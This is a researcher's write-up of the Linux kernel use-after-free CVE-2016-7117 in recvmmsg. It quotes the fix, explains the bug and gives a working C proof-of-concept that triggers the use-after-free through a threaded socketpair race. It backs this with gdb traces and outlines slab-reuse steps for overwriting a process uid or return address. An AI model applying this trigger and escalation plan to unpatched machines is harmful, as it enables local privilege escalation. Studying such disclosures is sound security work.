Notes about CVE-2016-7117

It's hard to find information about this, so I started looking deeper.

The Register has some cursory information:

The first of these (CVE-2016-7117) lies in the kernel networking subsystem allowing remote attackers to execute arbitrary code in the context of the kernel.

("Another critical hole (CVE-2016-0758 ) allows installed apps to execute arbitrary code within the context of the kernel via an elevation of privilege vulnerability in the kernel ASN.1 decoder." sounds fun too…)

The Debian and Ubuntu bug trackers both describe this as "use after free in the recvmmsg exit path", which is a big hint. The Debian page lists 4.5.2-1 as the "Fixed Version", which was released in April. That page's changelog includes "net: Fix use after free in the recvmmsg exit path". And so I found this email from March from Arnaldo Carvalho de Melo, with a patch:

diff --git a/net/socket.c b/net/socket.c
index c044d1e8508c..db13ae893dce 100644
--- a/net/socket.c
+++ b/net/socket.c
@@ -2240,31 +2240,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                cond_resched();
        }

-out_put:
-       fput_light(sock->file, fput_needed);
-
        if (err == 0)
-               return datagrams;
+               goto out_put;

-       if (datagrams != 0) {
+       if (datagrams == 0) {
+               datagrams = err;
+               goto out_put;
+       }
+
+       /*
+        * We may return less entries than requested (vlen) if the
+        * sock is non block and there aren't enough datagrams...
+        */
+       if (err != -EAGAIN) {
                /*
-                * We may return less entries than requested (vlen) if the
-                * sock is non block and there aren't enough datagrams...
+                * ... or  if recvmsg returns an error after we
+                * received some datagrams, where we record the
+                * error to return on the next call or if the
+                * app asks about it using getsockopt(SO_ERROR).
                 */
-               if (err != -EAGAIN) {
-                       /*
-                        * ... or  if recvmsg returns an error after we
-                        * received some datagrams, where we record the
-                        * error to return on the next call or if the
-                        * app asks about it using getsockopt(SO_ERROR).
-                        */
-                       sock->sk->sk_err = -err;
-               }
-
-               return datagrams;
+               sock->sk->sk_err = -err;
        }
+out_put:
+       fput_light(sock->file, fput_needed);

-       return err;
+       return datagrams;
 }

 SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
-- 
2.5.0

This was merged and became 34b88a6 in the kernel repository.

This code is in __sys_recvmmsg; it looks roughly like this (before the fix, at b6e4038, with irrelevant bits replaced with /* ... */):

Listing 1: net/socket.c:2169@b6e4038

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                   unsigned int flags, struct timespec *timeout)
{
        int fput_needed, err, datagrams;
        struct socket *sock;
        struct mmsghdr __user *entry;
        struct compat_mmsghdr __user *compat_entry;
        struct msghdr msg_sys;
        struct timespec end_time;

        if (timeout &&
            poll_select_set_timeout(&end_time, timeout->tv_sec,
                                    timeout->tv_nsec))
                return -EINVAL;

        datagrams = 0;

        sock = sockfd_lookup_light(fd, &err, &fput_needed);
        if (!sock)
                return err;

        err = sock_error(sock->sk);
        if (err)
                goto out_put;

        entry = mmsg;
        compat_entry = (struct compat_mmsghdr __user *)mmsg;

        while (datagrams < vlen) {
                /* ... */
                        err = ___sys_recvmsg(sock,
                                             (struct user_msghdr __user *)entry,
                                             &msg_sys, flags & ~MSG_WAITFORONE,
                                             datagrams);
                        if (err < 0)
                                break;
                        err = put_user(err, &entry->msg_len);
                        ++entry;
                }

                if (err)
                        break;
                ++datagrams;
                /* ... */
        }

out_put:
        fput_light(sock->file, fput_needed);

        if (err == 0)
                return datagrams;

        if (datagrams != 0) {
                /*
                 * We may return less entries than requested (vlen) if the
                 * sock is non block and there aren't enough datagrams...
                 */
                if (err != -EAGAIN) {
                        /*
                         * ... or  if recvmsg returns an error after we
                         * received some datagrams, where we record the
                         * error to return on the next call or if the
                         * app asks about it using getsockopt(SO_ERROR).
                         */
                        sock->sk->sk_err = -err;
                }

                return datagrams;
        }

        return err;
}

The old code calls sockfd_lookup_light, and doesn't always fput_light before it returns; the new code always calls fput_light. The email includes

And, as Dmitry rightly assessed, that is because we can drop the reference and then touch it when the underlying recvmsg calls return some packets and then hit an error, which will make recvmmsg to set sock->sk->sk_err, oops, fix it.

So, to demonstrate the use after free:

recvmmsg calls sockfd_lookup_light, which probably increases the refcount.
recvmmsg calls recvmsg
recvmsg returns an real packet. datagrams is incremented from 0.
recvmmsg calls recvmsg
recvmsg returns an error other than -EAGAIN.
recvmmsg breaks to the end of the while
fput_light is called, which decreases the refcount if it was increased above. Then the struct socket may be freed at any point.
err != 0, so we don't return datagrams
datagrams != 0 , and err != -EAGAIN, so we do sock->sk->sk_err = -err. This sock may have been freed after fput_light, so this is a use after free.

Questions:

How do we make recvmsg error for the second packet?
For a use-after-free, we need that to actually have been freed. How do we do that?
Ultimately we want to get the allocation that takes the place where sock was, fill in the sk pointer, and get the kernel to write to a place we choose. Is that realistic?

I'm going to think about this first from the perspective of a local user, since remote exploitation seems much harder.

Making `recvmsg` err

So __sys_recvmmsg calls ___sys_recvmsg, which calls copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); and returns an error if it does:

Listing 2: net/socket.c:2087@b6e4038

if (MSG_CMSG_COMPAT & flags)
        err = get_compat_msghdr(msg_sys, msg_compat, &uaddr, &iov);
else
        err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
if (err < 0)
        return err;

this looks promising (in copy_msghdr_from_user):

Listing 3: net/socket.c:1829@b6e4038

if (!access_ok(VERIFY_READ, umsg, sizeof(*umsg)) ||
    __get_user(uaddr, &umsg->msg_name) ||
    __get_user(kmsg->msg_namelen, &umsg->msg_namelen) ||
    __get_user(uiov, &umsg->msg_iov) ||
    __get_user(nr_segs, &umsg->msg_iovlen) ||
    __get_user(kmsg->msg_control, &umsg->msg_control) ||
    __get_user(kmsg->msg_controllen, &umsg->msg_controllen) ||
    __get_user(kmsg->msg_flags, &umsg->msg_flags))
        return -EFAULT;

and the manpage says

ERRORS These are some standard errors generated by the socket layer. Additional errors may be generated and returned from the underlying protocol modules; see their manual pages.

… EFAULT The receive buffer pointer(s) point outside the process's address space.

So I think we can send two valid messages, and have the second rcvmmsg header point to a bad receive buffer.

Closing the socket

This should be as easy as closing the socket in question in a thread while another thread is in recvmmsg.

Trying it out

We'll try triggering the panic from userspace.

Listing 4: try_recvmmsg.c

/* -*- compile-command: "gcc -Wall -Werror -pthread -static try_recvmmsg.c -o try_recvmmsg" -*- */
#define _GNU_SOURCE
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <pthread.h>

#define msg "hello!"

struct thread_config {
	int fds[2];
	char data[1024];
};

void *send_and_close_in_thread (void *arg)
{
	struct thread_config *config = arg;
	/* send the messages */
	for (size_t i = 0; i < 2; i++) {
		if (send(config->fds[0], msg, sizeof(msg), 0) != sizeof(msg)) {
			fprintf(stderr, "++ in send: %m\n");
			close(config->fds[0]);
			close(config->fds[1]);
			return NULL;
		}
	}
	/* wait for it to be received, then close things, so that the kernel doesn't EBADF */
	while (config->data[0] != msg[0]);;
	close(config->fds[0]);
	close(config->fds[1]);
	return NULL;
}

int main (int argc, char **argv)
{
	fprintf(stderr, "++ running!\n");
	struct thread_config config = {0};
	if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, config.fds)) {
		fprintf(stderr, "++ in socketpair: %m\n");
		return 1;
	}
	pthread_t thread = {0};
	if (pthread_create(&thread, NULL, send_and_close_in_thread, &config)) {
		fprintf(stderr, "++ in pthread_create: %m\n");
		close(config.fds[0]);
		close(config.fds[1]);
		return 1;

	}
	/* receive the first message fine.
	   try to receive the second message to a buffer out of our address space,
	   so that ___sys_recvmsg will return EFAULT. */
	recvmmsg(config.fds[1],
		 (struct mmsghdr[2]) {
			 {
				 .msg_hdr = {
					 .msg_iov = & (struct iovec) {
						 .iov_base = &config.data,
						 .iov_len = sizeof(config.data)
					 },
					 .msg_iovlen = 1
				 }
					 
			 },
			 {
				 .msg_hdr = {
					 .msg_iov = & (struct iovec) {
						 .iov_base = (void*) (~0),
						 .iov_len = 1024,
					 },
					 .msg_iovlen = 1
				 }
					 
			 },
		 },
		 2,
		 0,
		 & (struct timespec) { .tv_sec = 1 });
	fprintf(stderr, "++ no panic? got %s.\n", config.data);
	return 1;
		 
}

The timing is a little tricky: we have a thread send messages, wait for the first one to be received, and then close the fds. If it closes before the call to __sys_recvmmsg, __sys_recvmmsg will return EBADF. If it closes after __sys_recvmmsg sets the error on the sk_buff, we won't get a use-after-free.

Then the main thread tries to recvmmsg two messages, with a bad result buffer pointer on the second one. This way the second ___sys_recvmsg call errors, getting us on the code path we hit before.

I checked this was the right code path like this (gdb connected to qemu):

gdb) b copy_msghdr_from_user 
Breakpoint 21 at 0xffffffff82668db0: file net/socket.c, line 1823.
(gdb) c
Continuing.
[Switching to Thread 1]

Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
1823	{
(gdb) finish
Run till exit from #0  copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737e18, msg=0x1ffff1000d6e6003, msg_sys=0xffff88006b737df8, 
    flags=225341379, nosec=<optimized out>) at net/socket.c:2091
2091			err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $59 = 0
(gdb) c
Continuing.

Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
1823	{
(gdb) finish
Run till exit from #0  copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, 
    iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737b10, msg=0xffff88006b737b28, msg_sys=0xffff88006b737df8, 
    flags=225341266, nosec=<optimized out>) at net/socket.c:2091
2091			err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $60 = -14
(gdb) b socket.c:2265
Breakpoint 22 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.

Thread 1 hit Breakpoint 22, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7ffc232faac0, vlen=<optimized out>, flags=0, 
    timeout=0xffff88006b737ee0) at net/socket.c:2265
2265				sock->sk->sk_err = -err;
(gdb)

After running it a gdb a lot in a VM built on b6e4038 (the commit immediately before the fix), I got this (my notes in /* ... */ inline):

(gdb) b __sys_recvmmsg
Breakpoint 12 at 0xffffffff8266b440: file net/socket.c, line 2171.
(gdb) b socket.c:2265 /* sock->sk->sk_err = -err; */
Breakpoint 15 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.

Thread 2 hit Breakpoint 12, __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=2, flags=0, timeout=0xffff88006c4e7ee0)
    at net/socket.c:2171
2171	{
/* temporary break at sockfd_lookup_light so we can 'finish' in it to see if what it returns,
   as a cute trick to get around "<optimized out>" */
(gdb) tbreak sockfd_lookup_light 
Temporary breakpoint 20 at 0xffffffff82665940: file net/socket.c, line 450.
(gdb) c
Continuing.

Thread 2 hit Temporary breakpoint 20, sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8)
    at net/socket.c:450
450	{
(gdb) finish
Run till exit from #0  sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450
__sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2187
2187		if (!sock)
Value returned is $50 = (struct socket *) 0xffff88006bf61e00
(gdb) c
Continuing.

Thread 2 hit Breakpoint 15, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7fff9f3ccc80, vlen=<optimized out>, flags=0, 
    timeout=0xffff88006c4e7ee0) at net/socket.c:2265
2265				sock->sk->sk_err = -err;
/* !!! */
(gdb) p ((struct socket *)0xffff88006bf621c0)->file.f_count
Cannot access memory at address 0x38
/* ->file has been zeroed out, meaning this has been freed and used for something else */
(gdb) p ((struct socket *)0xffff88006bf621c0)->sk
$52 = (struct sock *) 0x0 <irq_stack_union>
(gdb) p &(((struct socket *)0xffff88006bf621c0)->sk->sk_err)
$53 = (int *) 0x1b0 <irq_stack_union+432>
(gdb)

So yes, we've got a use-after-free, and the kernel writes -err to the address at 0x1b0.

Why does it only work sometimes? I think it's because the actual free and using it again happens outside of the fput_light call tree, so we're racing with another task or two in the kernel. But we can do it repeatedly until it does work; it doesn't take long.

Reallocation

So we need to put some data where that struct socket used to be, such that sk is a pointer to a piece of data whose offset sk_err is where we would like to write.

struct socket is part of struct socket_alloc:

Listing 5: include/net/sock.h:1220@b6e4038

struct socket_alloc {
        struct socket socket;
        struct inode vfs_inode;
};

They're allocated in sock_alloc / sock_alloc_inode using the slab allocator This means that they're grabbed from "caches", which are spread across multiple "slabs". Caches are homogenous type-wise, and e.g. each struct socket_alloc in a cache is pre-initialized.

Some resources about the slab allocator:

"Slab Allocation" on Wikipedia
"Anatomy of the Linux Slab Allocator" on IBM developerworks (apparently no longer available, so this is a link to an archive).

I can think of a situation where we can use the slab allocator to get what we want to happen:

The slabs that are part of the struct socket_alloc cache (sock_inode_cache) fill up.
We create a socketpair for our use-after-free that occupies the first and second slot in a new slab.
We close both elements of our socketpair. This causes the slab to be freed. We then immediately add some items (more than a slabfull) to another cache, with the pointer we want to write to at offset sk in each item.
This causes a new slab to be allocated for the second cache, which ideally will be exactly where our first cache used to be. So, the struct socket pointer in __sys_recvmmsg now points to an item we control in a new slab.
The kernel code runs and sets the offset sk_err from our pointer to -err.

Some things that make it easier:

We can just repeatedly try it until it works, allocating an extra socket each time so that we progress through the slab.
/proc/slabinfo says that the sock_inode_cache slab has 12 objects per slab (in my vm; it seems to vary). This is an upper bound on the number of sockets we'll need to open to get an object at the beginning of the slab, assuming no other process is creating sockets.

That sounds totally possible!

What are we getting the kernel to write to? err is -14 in our case, so the kernel is writing 14 for us. If we control the pointer, though, we can line it up only partially with a field we want to overwrite, writing any portion of {0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} anywhere we choose. Some ideas:

Overwrite the uid of our process (and write 0xe to the byte before it), so that it has uid 0.
Overwrite a return address on the stack so that the kernel returns to code we choose. (This will be tricky with KASLR).
Overwrite a boolean on the stack to either 0 or 0xe (truthy) to get around some permission check.

However, I'm not actually sure how aggressively slabs get reused by different caches, and I'm not sure of an easy way to find out. But! We can probably use a lot of memory to make that happen, or try freeing a couple dozen slabs at the same time.

Which cache do we try to write to?

/proc/slabinfo says the sock_inode_cache has objects of size 640. This is kind of an inconvenient number, the only other objects with that size are also inode caches, and they don't have any user-controllable data at the offset of sk_err.

But the kmalloc cache kmalloc-1024 has 1024-size items in the caches, and 16 of them fit in the cache. If we can find a path in the kernel that copies data we control into a kmalloc bigger than 460 + sk_err + sizeof(void *) = 896, we can get the kernel to set an int at an address we choose to 14.

But there are a lot of calls to kmalloc in the kernel, and finding a good one will take time. So I'm publishing this now; I'll write more when I find one.

How much trouble are we in?

I think this exploit will work, so we have a pretty bad local privilege escalation bug. I was able to trigger the use-after-free in less than an hour of work after reading the description of the bug, and I'm not even a kernel hacker. Given more time I'm pretty sure I could make it repeatably write to a location of our choice.

I think this would be difficult to exploit remotely, for the following reasons:

recvmmsg is much less common than recvmsg, in the wild. GitHub search shows about 800k uses of recvmmsg vs about 3.6 million for recvmsg. recvmsg isn't all that common anyway; recv has about 29 million uses on GitHub.
A remote attacker would need to cause the recvmsg to err and cause the socket to close while in the recvmmsg call. Looking casually, I didn't see a great way to cause recvmmsg to err from the sending side. recvmsg and recvmmsg are normally used for connectionless protocols, anyway, so I wouldn't expect it to be easy to cause a service to close its socket.

But I'd love to be proven wrong.